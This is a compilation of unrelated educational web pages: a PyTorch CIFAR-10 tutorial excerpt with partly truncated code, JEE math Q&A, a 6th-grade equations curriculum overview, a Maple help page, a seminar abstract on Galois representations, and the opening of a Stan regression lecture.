Here is a implementation of our dataset object for the CIFAR dataset.
class Cifar10Dataset(torch.utils.data.Dataset):
def __init__(self, data_dir, data_size = 0, transforms = None):
files = os.listdir(data_dir)
files = [os.path.join(data_dir,x) for x in files]
if data_size < 0 or data_size > len(files):
assert("Data size should be between 0 to number of files in the dataset")
if data_size == 0:
data_size = len(files)
self.data_size = data_size
self.files = random.sample(files, self.data_size)
self.transforms = transforms
def __len__(self):
return self.data_size
def __getitem__(self, idx):
image = preprocess(image)
label = label_mapping[label_name]
image = image.astype(np.float32)
if self.transforms:
image = self.transforms(image)
return image, label
We also use the __getitem__ function to extract the label for an image encoded in its file name.
Dataset class allows us to incorporate the lazy data loading principle. This means instead of loading all data at once into the memory (which could be done by loading all the images in memory in the __init__ function rather than just addresses), it only loads a data example whenever it is needed (when __getitem__ is called).
When you create an object of the Dataset class, you basically can iterate over the object as you would over any python iterable. Each iteration, __getitem__ with the incremented index i as its input argument.
### Data Augmentations
I've passed a transforms argument in the __init__ function as well. This can be any python function that does data augmentation. While you can do the data augmentation right inside your preprocess code, doing it inside the __getitem__ is just a matter of taste.
Here, we can also add data augmentation. These data augmentations can be implemented as either functions or classes. You just have to make sure that you are able to apply them to your desired outcome in the __getitem__ function.
We have a plethora of data augmentation libraries that can be used to augment data.
For our case, torchvision library provides a lot of pre-built transforms along with the ability to compose them into one bigger transform. But we are going to keep our discussion limited to PyTorch here.
The Dataloader class facilitates
1. Batching of Data
2. Shuffling of Data
4. Prefetching, that is, while GPU crunches the current batch, Dataloader can load the next batch into memory in meantime. This means GPU doesn't have to wait for the next batch and it speeds up training.
You instantiate a Dataloader object with a Dataset object. Then you can iterate over a Dataloader object instance just like you did with a dataset instance.
However you can specify various options that can let you have more control on the looping options.
trainset = Cifar10Dataset(data_dir = "cifar/train/", transforms=None)
testset = Cifar10Dataset(data_dir = "cifar/test/", transforms=None)
testloader = torch.utils.data.DataLoader(testset, batch_size=128, shuffle=True, num_workers=2)
Both the trainset and trainloader objects are python generator objects which can be iterated over in the following fashion.
for data in trainloader: # or trainset
img, label = data
However, the Dataloader class makes things much more convenient than Dataset class. While on each iteration the Dataset class would only return us the output of the __getitem__ function, Dataloader does much more than that.
1. Notice that the our __getitem__ method of trainset returns a numpy array of shape 3 x 32 x 32. Dataloader batches the images into Tensor of shape 128 x 3 x 32 x 32. (Since batch_size = 128 in our code).
2. Also notice that while our __getitem__ method outputs a numpy array, Dataloader class automatically converts it into a Tensor
3. Even if the __getitem__ method returns a object which is of non-numerical type, the Dataloader class turns it into a list / tuple of size B (128 in our case). Suppose that __getitem__ also return the a string, namely the label string. If we set batch = 128 while instantiating the dataloader, each iteration, Dataloader will give us a tuple of 128 strings.
Add prefetching, multiple threaded loading to above benefits, using Dataloader class is preferred almost every time.
## Training and Evaluation
Before we start writing our training loop, we need to decide our hyperparameters and our optimisation algorithms. PyTorch provides us with many pre-built optimisation algorithms through its torch.optim .
### torch.optim
torch.optim module provides you with multiple functionalities associated with training / optimisation like.
1. Different optimisation algorithms (like optim.SGD, optim.Adam)
2. Ability to schedule the learning rate (with optim.lr_scheduler)
3. Ability to having different learning rates for different parameters (we will not discuss this in this post though).
We use a cross entropy loss, with momentum based SGD optimisation algorithm. Our learning rate is decayed by a factor of 0.1 at 150th and 200th epoch.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") #Check whether a GPU is present.
clf = ResNet()
clf.to(device) #Put the network on GPU if present
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(clf.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[150, 200], gamma=0.1)
In the first line of code, device is set to cuda:0 if a GPU number 0 if it is present and cpu if not.
By default, when we initialise a network, it resides on the CPU. clf.to(device) moves the network to GPU if present. We will cover how to use multiple GPUs in more detail in the another part. We can alternatively use clf.cuda(0) to move our network clf to GPU 0 . (Replace 0 by index of the GPU in general case)
criterion is basically a nn.CrossEntropy class object which, as the name suggests, implements the cross entropy loss. It basically subclasses nn.Module.
We then define the variable optimizer as an optim.SGD object. The first argument to optim.SGD is clf.parameters(). The parameters() function of a nn.Module object returns it's so called parameters (Implemented as nn.Parameter objects, we will learn about this class in a next part where we explore advanced PyTorch functionality. For now, think of it as a list of associated Tensors which are learnable). clf.parameters() are basically the weights of our neural network.
As you will see in the code, we will call step() function on optimizer in our code. When step() is called, the optimizer updates each of the Tensor in clf.parameters() using the gradient update rule equation. The gradients are accessed by using the grad attribute of each Tensor
Generally, the first argument to any optimiser whether it be SGD, Adam or RMSprop is the list of Tensors it is supposed to update. The rest of arguments define the various hyperparameters.
scheduler , as the name suggests, can schedule various hyperparameters of the optimizer. optimizer is used to instantiate scheduler. It updates the hyperparameters everytime we call scheduler.step()
### Writing the training loop
We finally train for 200 epochs. You can increase the number of epochs. This might take a while on a GPU. Again the idea of this tutorial is to show how PyTorch works and not to attain the best accuracy.
We evaluate classification accuracy every epoch.
for epoch in range(10):
losses = []
scheduler.step()
# Train
start = time.time()
for batch_idx, (inputs, targets) in enumerate(trainloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = clf(inputs) # Forward pass
loss = criterion(outputs, targets) # Compute the Loss
optimizer.step() # Updated the weights
losses.append(loss.item())
end = time.time()
if batch_idx % 100 == 0:
print('Batch Index : %d Loss : %.3f Time : %.3f seconds ' % (batch_idx, np.mean(losses), end - start))
start = time.time()
# Evaluate
clf.eval()
total = 0
correct = 0
for batch_idx, (inputs, targets) in enumerate(testloader):
inputs, targets = inputs.to(device), targets.to(device)
outputs = clf(inputs)
_, predicted = torch.max(outputs.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
print('Epoch : %d Test Acc : %.3f' % (epoch, 100.*correct/total))
print('--------------------------------------------------------------')
clf.train()
Now, the above is a large chunk of code. I didn't break it into smaller ones so as to not risk continuity. While I've added comments in the code to inform the reader what's going on, I will now explain the not so trivial parts in the code.
We first call scheduler.step() at the beginning of epoch to make sure that optimizer will use the correct learning rate.
The first thing inside the loop we do is that we move our input and target to GPU 0. This should be the same device on which our model resides, otherwise PyTorch will throw up and error and halt.
Notice we call optimizer.zero_grad() before our forward pass. This is because a leaf Tensors (which are weights are) will retain the gradients from previous passes. If backward is called again on the loss, the new gradients would simply be added to the earlier gradients contained by the grad attribute. This functionality comes handy when working with RNNs, but for now, we need to set the gradients to zero so the gradients don't accumulate between subsequent passes.
We also put our evaluation code inside torch.no_grad context, so that no graph is created for evaluation. If you find this confusing, you can go back to part 1 to refresh your autograd concepts.
Also notice, we call clf.eval() on our model before evaluation, and then clf.train() after it. A model in PyTorch has two states eval() and train(). The difference between the states is rooted in stateful layers like Batch Norm (Batch statistics in training vs population statistics in inference) and Dropout which behave different during inference and training. eval tells the nn.Module to put these layers in inference mode, while training tells nn.Module to put it in the training mode.
# Conclusion
This was an exhaustive tutorial where we showed you how to build a basic training classifier. While this is only a start, we have covered all the building blocks that can let you get started with developing deep networks with PyTorch.
In the next part of this series, we will look into some of the advanced functionality present in PyTorch that will supercharge your deep learning designs. These include ways to create even more complex architectures, how to customise training such as having different learning rates for different parameters. | 2021-09-21 18:01:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2726709544658661, "perplexity": 3019.151570108766}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057225.57/warc/CC-MAIN-20210921161350-20210921191350-00346.warc.gz"} |
https://learn.careers360.com/engineering/questions/jee_main-maths-complex_numbers_and_quadratic_equations/?page=2 | ## Filters
Sort by :
Clear All
Q
If $z=\frac{\sqrt{3}}{2}+\frac{i}{2}\left ( i=\sqrt{-1} \right ),$ then $\left ( 1+iz+z^{5}+iz^{8} \right )^{9}$ is equal to :
• Option 1)
$0$
• Option 2)
$1$
• Option 3)
$\left ( -1+2i \right )^{9}$
• Option 4)
$-1$
(cube root of unity) Option 1) Option 2) Option 3) Option 4)
If the fourth term of the binomial expansion $\left ( \sqrt{\frac{1}{x^{1+\log_{10}x}}}+x^{\frac{1}{12}} \right )^{6}$ is equal to $200,$ and $x>1$, then the value of x is :
• Option 1)
$100$
• Option 2)
$10$
• Option 3)
$10^{3}$
• Option 4)
$10^{4}$
Fourth term is given So, take log both side. put Option 1) Option 2) Option 3) Option 4)
If $\alpha \; and\; \beta$ be the roots of the equation $x^{2}-2x+2=0$, then the least value of n for which $\left ( \frac{\alpha }{\beta } \right )^{n}=1$ is :
• Option 1)
$2$
• Option 2)
$5$
• Option 3)
$4$
• Option 4)
$3$
So Option 1) Option 2) Option 3) Option 4)
The sum of the solutions of the equation $\left | \sqrt{x}-2 \right |+\sqrt{x}\left (\sqrt{x}-4 \right )+2=0,(x>0)$ is equal to :
• Option 1)
$12$
• Option 2)
$10$
• Option 3)
$9$
• Option 4)
$4$
Sum Option 1) Option 2) Option 3) Option 4)
Let Z = x +iy Hence z will lie on imaginary axis for every x
15519652398521476122459.jpg Solve it
The number of complex number z which satisfy z^2+2|z|^2=2
@mannika If you look at problem, , it is clear that must be real. if you solve you get so, if we represent
15519582136261468787462.jpg The number of complex number z such that |z-i|=|z+i|=|z+1| is
@mannika We are given that, |z-i| = |z- (-i)| = |z- (-1)| we know that in a complex plane, |z-a| represents distance of z from complex number a. Now we are given, 3 points (0,1);(0,-1);(-1,0) from which distance of z is equal.But we know in a plane there exist only 1 point which are equidistant from these 3 points which is centroid of triangle made by these 3 points.
i have not understood anything in cube root of unity topic video
z3 = 1
$\\z^3-1=0\\(z-1)(z^2+z+1)=0\\in\:the\:above\:z-1=0\:\:or\:\:z^2+z+1=0\\so,z=1,z=-\frac{1}{2}\pm\frac{i\sqrt3}{2}\\cube\:root\:of\:unity\:are\:1,-\frac{1}{2}+\frac{i\sqrt3}{2}\:\:and\:\:-\frac{1}{2}-\frac{i\sqrt3}{2}\\$
View More
If the roots of the quadratic equation$x^2 + px + q = 0$ are tan30° and tan15°, respectively then the value of 2 + q − p is
• Option 1)
2
• Option 2)
3
• Option 3)
0
• Option 4)
1
Option 1) 2 Option 2) 3 Option 3) 0 Option 4) 1
All the values of m for which both roots of the equations x2 − 2mx + m2 − 1 = 0 are greater than −2 but less than 4, lie in the interval
• Option 1)
−2 < m < 0
• Option 2)
m > 3
• Option 3)
−1 < m < 3
• Option 4)
1 < m < 4
Option 1) −2 < m < 0 Option 2) m > 3 Option 3) −1 < m < 3 Option 4) 1 < m < 4
IMG_20190109_35438.jpg Sum of roots of the equation (x + — 41x + 31+ 3 = O is -
@Arvind 1.
15470031512802109424855.jpg Number of negative integral value of x satisfying
@Vijay Q42
IMG_20190115_201103.jpg
The solution of the inequation |x2-2x-3|<|x2-x+5| is-
15475677420921088009151.jpg |f(x)|=|x2-2x-3| |g(x)|=|x2-x+5| |f(x)|<|g(x)| plot graph of f(x) and g(x)
Sir in |z-2+3i| how we get Centre as (2,3)
@Arvind
how do you get y is less than or equal to 2 from that (y-2)^2 =y (y-2)^2 is less than or equal to 2
@santhosh we are taking different cases (1) when y is less than or equal 2 (2) when 2<y less than or equal to 3 (3) y is greater than 3
Screenshot_718.png
Screenshot_719.png
Screenshot_716.png
santosh2.jpg for atleast one negative value of x (x-x_1)(x-x_2) is less than 0 and Discriminant is greater than 0
Screenshot_715.png
santosh.jpg put x-1=y^2 simplify use the concept that value under any square root is always greater then or equal to 0
rps20190122_174705.jpg
so roots are (x,y ) = $(\frac{1}{\sqrt{2}},-\:\frac{1}{\sqrt{2}}\:)$ or $(-\:\frac{1}{\sqrt{2}},\frac{1}{\sqrt{2}}\:)$
View More
Exams
Articles
Questions | 2020-02-27 22:35:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 29, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8265306949615479, "perplexity": 2365.020809030877}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875146907.86/warc/CC-MAIN-20200227221724-20200228011724-00239.warc.gz"} |
https://www.fishtanklearning.org/curriculum/math/6th-grade/equations-and-inequalities/ | # Equations and Inequalities
Students discover how to use equations and inequalities to model relationships between quantities, and investigate the meaning of having a solution to an equation or an inequality.
Math
Unit 6
## Unit Summary
In Unit 6, sixth graders move from expressions to equations and inequalities. They revisit familiar diagrams such as tape diagrams to model equations, and they discover new models such as balances and hanging mobiles. Students investigate what it means to be a solution to an equation or an inequality and how to use equations and inequalities to model relationships between quantities. When using an equation or inequality to represent real-world situations, students must decontextualize the situation to represent it using variables and symbols and then recontextualize in order to interpret what their answer means in regard to the situation at hand (MP.2). In this unit, students bring concepts from three domains together: Ratios and Proportions, Number Sense, and Expressions and Equations. They re-visit percentages from Unit 2 and solve percent problems using equations. They study relationships between different quantities and draw on their ratio reasoning where relevant. A note on fluency: solving equations provides a good opportunity for students to continue development of and to demonstrate fluency with decimal operations and fraction division. Several problems involve computing with decimals and dividing by fractions; include additional problems in practice for students as needed.
Several prior skills support students in this unit. In fifth grade, students analyzed patterns and relationships when they studied standard 5.OA.3. They also observed what happened when these relationships were plotted on the coordinate plane. In previous sixth-grade units, students studied algebraic and numerical expressions and collections of equivalent ratios. Students draw on all of these concepts and skills in this unit.
There are many future connections to the standards in this unit. In seventh grade, students will deeply investigate proportional relationships in the form $$y=rx$$, understanding the value of $$r$$ as the constant of proportionality. They’ll further investigate the graphs of these equations, and in eighth grade, students will compare across multiple representations of proportional relationships. Students will also become exposed to increasingly more complex equations and inequalities to solve.
Pacing: 17 instructional days (14 lessons, 2 flex days, 1 assessment day)
Fishtank Plus for Math
Unlock features to optimize your prep time, plan engaging lessons, and monitor student progress.
## Assessment
The following assessments accompany Unit 6.
### Pre-Unit
Have students complete the Pre-Unit Assessment and Pre-Unit Student Self-Assessment before starting the unit. Use the Pre-Unit Assessment Analysis Guide to identify gaps in foundational understanding and map out a plan for learning acceleration throughout the unit.
### Mid-Unit
Have students complete the Mid-Unit Assessment after lesson 6.
### Post-Unit
Use the resources below to assess student mastery of the unit content and action plan for future units.
Expanded Assessment Package
Use student data to drive your planning with an expanded suite of unit assessments to help gauge students’ facility with foundational skills and concepts, as well as their progress with unit content.
## Unit Prep
### Intellectual Prep
Unit Launch
Prepare to teach this unit by immersing yourself in the standards, big ideas, and connections to prior and future content. Unit Launches include a series of short videos, targeted readings, and opportunities for action planning.
#### Internalization of Standards via the Post-Unit Assessment
• Take the Post-Unit Assessment. Annotate for:
• Standards that each question aligns to
• Strategies and representations used in daily lessons
• Relationship to Essential Understandings of unit
• Lesson(s) that Assessment points to
#### Internalization of Trajectory of Unit
• Read and annotate the Unit Summary.
• Notice the progression of concepts through the unit using the Lesson Map.
• Essential Understandings
• Connection to Post-Unit Assessment questions
• Identify key opportunities to engage students in academic discourse. Read through our Teacher Tool on Academic Discourse and refer back to it throughout the unit.
#### Unit-Specific Intellectual Prep
Model Example Tape diagram Balance/mobile
### Essential Understandings
• A solution to an equation or inequality represents the value(s) for the variable that, when substituted in, make the equation or inequality a true statement. The solution set to an inequality can be represented using a ray on a number line.
• Equations are statements of balance between two expressions. In order to solve for a variable in an equation, whatever actions are taken on one side of the equation must also be taken on the other side in order to maintain the balance.
• An equation can be used to model the association between two quantities where one quantity is considered the independent variable and the other quantity is the dependent variable. These relationships can be represented in a table of values and graphed in the coordinate plane.
### Vocabulary
dependent variable
equation
inequality
independent variable
percent equation
solution
substitution
To see all the vocabulary for Unit 6, view our 6th Grade Vocabulary Glossary.
### Materials
• Optional: Balance scale (Teacher set)
• Optional: Graph Paper (2-3 sheets per student)
To see all the materials needed for this course, view our 6th Grade Course Material Overview.
## Lesson Map
Topic A: Reasoning About and Solving Equations
Topic B: Reasoning About and Solving Inequalities
Topic C: Representing and Analyzing Quantitative Relationships
## Common Core Standards
Key
Major Cluster
Supporting Cluster
### Core Standards
#### Expressions and Equations
• 6.EE.B.5 — Understand solving an equation or inequality as a process of answering a question: which values from a specified set, if any, make the equation or inequality true? Use substitution to determine whether a given number in a specified set makes an equation or inequality true.
• 6.EE.B.6 — Use variables to represent numbers and write expressions when solving a real-world or mathematical problem; understand that a variable can represent an unknown number, or, depending on the purpose at hand, any number in a specified set.
• 6.EE.B.7 — Solve real-world and mathematical problems by writing and solving equations of the form x + p = q and px = q for cases in which p, q and x are all nonnegative rational numbers.
• 6.EE.B.8 — Write an inequality of the form x > c or x < c to represent a constraint or condition in a real-world or mathematical problem. Recognize that inequalities of the form x > c or x < c have infinitely many solutions; represent solutions of such inequalities on number line diagrams.
• 6.EE.C.9 — Use variables to represent two quantities in a real-world problem that change in relationship to one another; write an equation to express one quantity, thought of as the dependent variable, in terms of the other quantity, thought of as the independent variable. Analyze the relationship between the dependent and independent variables using graphs and tables, and relate these to the equation. For example, in a problem involving motion at constant speed, list and graph ordered pairs of distances and times, and write the equation d = 65t to represent the relationship between distance and time.
#### Ratios and Proportional Relationships
• 6.RP.A.3 — Use ratio and rate reasoning to solve real-world and mathematical problems, e.g., by reasoning about tables of equivalent ratios, tape diagrams, double number line diagrams, or equations.
• 6.RP.A.3.A — Make tables of equivalent ratios relating quantities with whole number measurements, find missing values in the tables, and plot the pairs of values on the coordinate plane. Use tables to compare ratios.
• 6.RP.A.3.C — Find a percent of a quantity as a rate per 100 (e.g., 30% of a quantity means 30/100 times the quantity); solve problems involving finding the whole, given a part and the percent.
• 6.EE.A.1
• 6.EE.A.2
• 6.EE.A.3
• 5.NF.A.1
• 5.NF.B.3
• 5.NF.B.4
• 5.OA.B.3
• 6.RP.A.1
• 6.RP.A.2
• 6.RP.A.3
• 6.NS.A.1
• 6.NS.B.2
• 6.NS.B.3
• 6.NS.C.6.C
• 6.NS.C.7
• 7.EE.B.4
• 8.EE.B.5
• 8.EE.B.6
• 8.EE.C.7
• 8.F.A.1
• 7.RP.A.2
• 7.RP.A.3
### Standards for Mathematical Practice
• CCSS.MATH.PRACTICE.MP1 — Make sense of problems and persevere in solving them.
• CCSS.MATH.PRACTICE.MP2 — Reason abstractly and quantitatively.
• CCSS.MATH.PRACTICE.MP3 — Construct viable arguments and critique the reasoning of others.
• CCSS.MATH.PRACTICE.MP4 — Model with mathematics.
• CCSS.MATH.PRACTICE.MP5 — Use appropriate tools strategically.
• CCSS.MATH.PRACTICE.MP6 — Attend to precision.
• CCSS.MATH.PRACTICE.MP7 — Look for and make use of structure.
• CCSS.MATH.PRACTICE.MP8 — Look for and express regularity in repeated reasoning.
Unit 5
Numerical and Algebraic Expressions
Unit 7
Geometry | 2023-01-28 18:51:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.48150715231895447, "perplexity": 2565.583166299416}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499654.54/warc/CC-MAIN-20230128184907-20230128214907-00678.warc.gz"} |
https://www.maplesoft.com/support/help/Maple/view.aspx?path=AFactors | AFactors - Maple Programming Help
# Online Help
###### All Products Maple MapleSim
AFactors
inert absolute factorization
Calling Sequence AFactors(p)
Parameters
p - multivariate polynomial
Description
• The AFactors function is a placeholder for representing an absolute factorization of the polynomial p, that is a factorization over an algebraic closure of its coefficient field. It is used in conjunction with evala.
• The construct AFactors(p) produces a data structure of the form $[u,[[{f}_{1},{ⅇ}_{1}],...,[{f}_{n},{ⅇ}_{n}]]]$ such that $p=u{{f}_{1}}^{{ⅇ}_{1}}...{{f}_{n}}^{{ⅇ}_{n}}$, where each ${f}_{i}$ is a monic (for the ordering chosen by Maple) irreducible polynomial.
• The call evala(AFactors(p)) computes the factorization of the polynomial p over the field of complex numbers. The polynomial p must have algebraic number coefficients.
• In the case of a univariate polynomial, the absolute factorization is just the decomposition into linear factors.
Examples
> $\mathrm{evala}\left(\mathrm{AFactors}\left({x}^{2}-2{y}^{2}\right)\right)$
$\left[{1}{,}\left[\left[{x}{-}{\mathrm{RootOf}}{}\left({{\mathrm{_Z}}}^{{2}}{-}{2}\right){}{y}{,}{1}\right]{,}\left[{x}{+}{\mathrm{RootOf}}{}\left({{\mathrm{_Z}}}^{{2}}{-}{2}\right){}{y}{,}{1}\right]\right]\right]$ (1)
See Also
## Was this information helpful?
Please add your Comment (Optional) E-mail Address (Optional) What is ? This question helps us to combat spam | 2017-08-22 07:19:45 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 5, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9859135746955872, "perplexity": 1683.0020841770754}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-34/segments/1502886110485.9/warc/CC-MAIN-20170822065702-20170822085702-00299.warc.gz"} |
https://wesolveproblems.org.uk/collection/my-new-collection/ | My New Collection – We Solve Problems
Problems:
#### Theory of algorithms (other)11-13
A cat tries to catch a mouse in labyrinths A, B, and C. The cat walks first, beginning with the node marked with the letter “K”. Then the mouse $($ from the node “M”$)$ moves, then again the cat moves, etc. From any node the cat and mouse go to any adjacent node. If at some point the cat and mouse are in the same node, then the cat eats the mouse.
Can the cat catch the mouse in each of the cases A, B, C?
$\\$
$\\$
A B C
#### Boundedness, monotonicity , Quadratic inequaities and systems of inequalities14-17
For which natural K does the number reach its maximum value?
My Problem Set reset
No Problems selected | 2021-11-28 21:18:41 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.35551679134368896, "perplexity": 2811.6694926300133}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358591.95/warc/CC-MAIN-20211128194436-20211128224436-00606.warc.gz"} |
https://www.isid.ac.in/~statmath/?module=ViewSeminarDetails&Id=222 | # Seminar at SMU Delhi
October 14, 2015 (Wednesday) , 3:30 PM at Webinar
Speaker: Devika Sharma, Indian Statistical Institute, Delhi
Title: Modular Galois representations
Abstract of Talk
Let $p$ be a prime and let $f$ be a modular form. Let $\rho_f$ be the two dimensional $p$-adic Galois representation attached to $f$. We are interested in the (local) behaviour of $\rho_f$ when $f$ is a $p$-ordinary form of weight at least $2$. A result of Wiles and Mazur-Wiles says that when $f$ is $p$-ordinary, $\rho_f$ restricted to the decomposition group $G_p$ at $p$ is reducible. Greenberg asked the natural question; when does $\rho_f \lvert_{G_p}$ split? It is not too hard to see that $\rho_f \lvert_{G_p}$ splits if $f$ has complex multiplication (CM). In this talk, we will discuss the converse, i.e., $$\rho_f \lvert_{G_p} \hbox{ splits} \stackrel{?}{\Longrightarrow} f \hbox{ has CM}.$$ We use deformation theory of Galois representations and the theory of $p$-adic families of modular forms (Hida families) to generate various non-trivial examples in support of the converse. I will describe these ideas in sufficient detail. This is joint work with Eknath Ghate. | 2021-04-17 20:40:56 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8089200258255005, "perplexity": 379.8764241474433}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038464045.54/warc/CC-MAIN-20210417192821-20210417222821-00281.warc.gz"} |
https://jonathantemplin.github.io/Bayesian-Psychometric-Modeling-Course-Fall2022/lectures/lecture03b/03b_Efficent_Stan_Code_and_Generated_Quantities.html | # Efficent Stan Code and Generated Quantities
## Today’s Lecture Objectives
1. Making Stan Syntax Shorter
2. Computing Functions of Model Parameters
## Making Stan Code Shorter
The Stan syntax from our previous model was lengthy:
• A declared variable for each parameter
• The linear combination of coefficients multiplying predictors
Stan has built-in features to shorten syntax:
• Matrices/Vectors
• Matrix products
• Multivariate distributions (initially for prior distributions)
## Linear Models without Matrices
The linear model from our example was:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
with:
• $\text{Group2}_p$ the binary indicator of person $p$ being in group 2
• $\text{Group3}_p$ the binary indicator of person $p$ being in group 3
• $e_p \sim N(0,\sigma_e)$
## Linear Models with Matrices
Model (predictor) matrix:
$\textbf{X} = \left[ \begin{array}{cccccc} 1 & -4 & 0 & 0 & 0 & 0 \\ & & \vdots & & & \\ 1 & 12 & 0 & 1 & 0 & 12 \\ \end{array} \right]$
Coefficients vector:
$\boldsymbol{\beta} = \left[ \begin{array}{c} \beta_0 \\ \beta_1 \\ \beta_2 \\ \beta_3 \\ \beta_4 \\ \beta_5 \\ \end{array} \right]$
head(model.matrix(FullModelFormula, data = DietData))
(Intercept) Height60IN factor(DietGroup)2 factor(DietGroup)3
1 1 -4 0 0
2 1 0 0 0
3 1 4 0 0
4 1 8 0 0
5 1 12 0 0
6 1 -6 0 0
Height60IN:factor(DietGroup)2 Height60IN:factor(DietGroup)3
1 0 0
2 0 0
3 0 0
4 0 0
5 0 0
6 0 0
## Linear Models with Matrices
Using matrices, we can rewrite our regression equation from
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
To:
$\textbf{WeightLB} = \textbf{X}\boldsymbol{\beta} + \textbf{e}$
Where:
